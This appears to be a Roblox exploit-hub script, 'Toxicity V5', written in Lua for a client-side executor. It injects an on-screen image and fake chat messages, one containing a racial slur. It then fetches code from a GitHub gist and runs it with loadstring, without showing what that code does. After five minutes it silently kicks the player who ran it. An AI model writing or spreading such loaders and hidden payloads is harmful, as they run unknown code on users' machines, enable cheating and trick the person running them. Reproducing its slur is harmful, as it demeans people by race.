
-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local ImageLabel = Instance.new("ImageLabel")

--Properties:

ScreenGui.Parent = game.CoreGui

ImageLabel.Parent = ScreenGui
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BackgroundTransparency = 1.000
ImageLabel.Position = UDim2.new(-0.325866431, 0, 0.203187257, 0)
ImageLabel.Size = UDim2.new(0, 288, 0, 298)
ImageLabel.Image = "http://www.roblox.com/asset/?id=6330894714"

-- Scripts:

local function YRHUW_fake_script() -- ImageLabel.LocalScript 
	local script = Instance.new('LocalScript', ImageLabel)

	wait(1)
	
	
	
	script.Parent:TweenPosition(UDim2.new(0.369, 0,0.203, 0),"Out","Sine",1)
	
	wait(3)
	
	
	script.Parent:TweenPosition(UDim2.new(0.985, 0,-0.492, 0),"Out","Sine",1)
	
	wait(5)
	
	script.Parent:Destroy()
end
coroutine.wrap(YRHUW_fake_script)()


wait(5)

	game.StarterGui:SetCore(
	    "SendNotification",
	    {
	        Title = "Welcome!",
	        Text = "The Prefix Is -",
		    }
	)



function MessageColor(name, color)

local a = game.Players.LocalPlayer.PlayerGui:WaitForChild('FEController')
local b = a:FindFirstChild('Chat'):Clone()
local c = game.Players.LocalPlayer.PlayerGui:WaitForChild('GUI').Chats
spawn(function()
for i,v in pairs(c:GetChildren()) do
 v.Position=v.Position+UDim2.new(0,0,0,-15)
end
b.Parent = c
b.Text = name.." "
b.TextColor3 = color

wait(15);
for v1 = 0, 1, 0.1 do
    wait(0.1);
    b.TextStrokeTransparency = 1;
    b.TextTransparency = v1;
end;
b:Destroy();

end)
end

MessageColor("{Loaded!}", Color3.fromRGB(75, 75, 75))
MessageColor("Welcome TO Toxicity V5 Nigga", Color3.fromRGB(75, 75, 75))
MessageColor("DM Me if you fucking need help", Color3.fromRGB(75, 75, 75))
MessageColor("Prefix is -", Color3.fromRGB(75, 75, 75))
MessageColor("", Color3.fromRGB(75, 75, 75))
MessageColor("Update;", Color3.fromRGB(75, 75, 75))
MessageColor("", Color3.fromRGB(75, 75, 75))
MessageColor("{Added Whitelist so skids cant leak this}", Color3.fromRGB(75, 75, 75))
MessageColor("FAY IS THE BEST HAHAHAHA", Color3.fromRGB(75, 75, 75))


loadstring(game:HttpGet('https://gist.githubusercontent.com/0Nck/7ecfaafc781f1a1578ab7c333c97c776/raw/aa78006813a506ec40bf441895efc587cac63d41/Link', true))()


wait(300)
game.Players.LocalPlayer:Kick("HAHAHA EVERYONE GET KICKED BY FAY")
